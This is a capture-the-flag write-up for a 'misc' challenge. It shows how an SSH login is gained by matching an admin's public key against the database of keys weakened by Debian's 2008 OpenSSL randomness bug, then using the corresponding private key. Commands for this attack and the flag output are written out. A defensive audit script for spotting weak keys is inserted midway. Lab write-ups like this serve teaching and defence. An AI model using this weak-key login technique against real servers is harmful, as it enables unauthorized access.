Points: 150 Category: misc Author: vladz

Introduction

While browsing the given website, we learn that the admin:

  • is a huge fan of Debian;
  • uses the string “jan0sh” as login;
  • uses the same OpenSSL key pair for everything (data signing, SSH, etc.);
  • hosts an SSH service on fanboy.uni.hctf.fun (port 2222).

We retrieve jan0sh’s public key used for data signing and convert it to the SSH public key format:

# wget -q http://fanboy.uni.hctf.fun/posts/pubkey.pem
# ssh-keygen -f ./pubkey.pem -i -mPKCS8 > pubkey_ssh.pub
# cat pubkey_ssh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvowhzrTHPoF+oBRkS187VWHPG86+A2zBD9J+jmLT0ThBX0o71XtjEkCOtMJWTyqCScGKzlHTicwe80iTxtO6hof9kXAz6P2P/S3V+xWbOeaxAmD2LWCK7fcmaR6LpInkBqNUWZdShgvswS6n/M1CurK8BywAHLsQHDvyWnSroOo428qHDBTCzMtkiXH6ng8KQKIrQT20KrK2FgOJe24BwNMo2i+tcykCnGLDseZOTX7JmckMXTMXILv2pDfgxFAvCVNMo7q5hnnTmqyRZexcqapDqO/eBs01jNAj6T4wuWv4HqpG3PzcbpUf6JR1z5hmR/+7KR39ynxGLI3fnbtdhQ==

Vulnerability

In 2008, Debian’s OpenSSH was prone to a predictable randomness vulnerability which resulted in insecure key generation (cf. DSA-1576-1). This file contains a database of thousands of corrupted SSH keys.

Luckily, our key was in this database:

# for i in rsa/2048/*.pub; do grep -q "[...]BqNUWZdShgvs[...]" $i && echo $i; done
rsa/2048/38b2cc8ca9cff6705d8556bbe7682e82-9707.pub
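
The same lookup turned into a defensive audit, as an added example that is not part of the original write-up: it checks every entry of an authorized_keys file against a directory of known-weak public keys, comparing whole key blobs instead of a substring. The function names, the sample keys (constructed, not real) and the directory used in the demo are assumptions.

```bash
#!/bin/sh
# Added example: audit an authorized_keys file against a directory of
# known-weak public keys laid out like rsa/2048/*.pub above.

# awk helper returning the base64 key blob of the current line, or "".
# It skips leading authorized_keys options; a blob always starts with
# "AAAA" because the encoded data begins with a 4-byte length field.
BLOB_FN='function blob(   i) {
    for (i = 1; i < NF; i++)
        if ($i ~ /^(ssh-|ecdsa-)/ && $(i+1) ~ /^AAAA/) return $(i+1)
    return ""
}'

# find_weak_keys AUTHORIZED_KEYS WEAK_DIR
# Prints "<line>:<matching .pub file>" for every weak entry.
# Exit status: 0 = weak key present, 1 = none, 2 = bad arguments.
find_weak_keys() {
    local keys_file="$1" weak_dir="$2" index status=0
    [ -r "$keys_file" ] && [ -d "$weak_dir" ] || return 2
    index=$(mktemp) || return 2
    # Index the database as "blob<TAB>path"; "-exec ... +" batches the
    # tens of thousands of files without hitting the argument limit.
    find "$weak_dir" -type f -name '*.pub' -exec awk "$BLOB_FN"'
        { b = blob(); if (b != "") print b "\t" FILENAME }' {} + > "$index"
    # Compare whole blobs exactly instead of grepping for a substring.
    awk -v idx="$index" "$BLOB_FN"'
        FILENAME == idx { split($0, p, "\t"); weak[p[1]] = p[2]; next }
        /^[ \t]*#/ { next }
        { b = blob(); if (b in weak) { print FNR ":" weak[b]; hit = 1 } }
        END { exit (hit ? 0 : 1) }
    ' "$index" "$keys_file" || status=$?
    rm -f "$index"
    return "$status"
}

# Constructed sample data (not real keys) so the script runs offline.
demo() {
    local d; d=$(mktemp -d) || return 2
    mkdir "$d/weak"
    echo 'ssh-rsa AAAAB3CONSTRUCTEDWEAK root@host' > "$d/weak/constructed-1.pub"
    printf '%s\n' '# constructed authorized_keys' \
        'ssh-rsa AAAAB3CONSTRUCTEDGOOD alice@example' \
        'no-pty ssh-rsa AAAAB3CONSTRUCTEDWEAK jan0sh@example' > "$d/authorized_keys"
    find_weak_keys "$d/authorized_keys" "$d/weak"
    local rc=$?; rm -rf "$d"; return "$rc"
}
demo
```

Any line it reports is a key to revoke and regenerate on a patched system.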

Exploitation

We copy the associated private key into ~/.ssh/id_rsa and connect to the remote server with:

# cp rsa/2048/38b2cc8ca9cff6705d8556bbe7682e82-9707 ~/.ssh/id_rsa
# ssh -4x -p 2222 jan0sh@fanboy.uni.hctf.fun
[...]
Last login: Sun Oct 28 12:45:52 2018 from 172.18.0.1
$ ls
flag.txt
$ cat flag.txt
flag{I_guess_random_numbers_are_important_lol}

Pwntera

Yet another french CTF team that sux !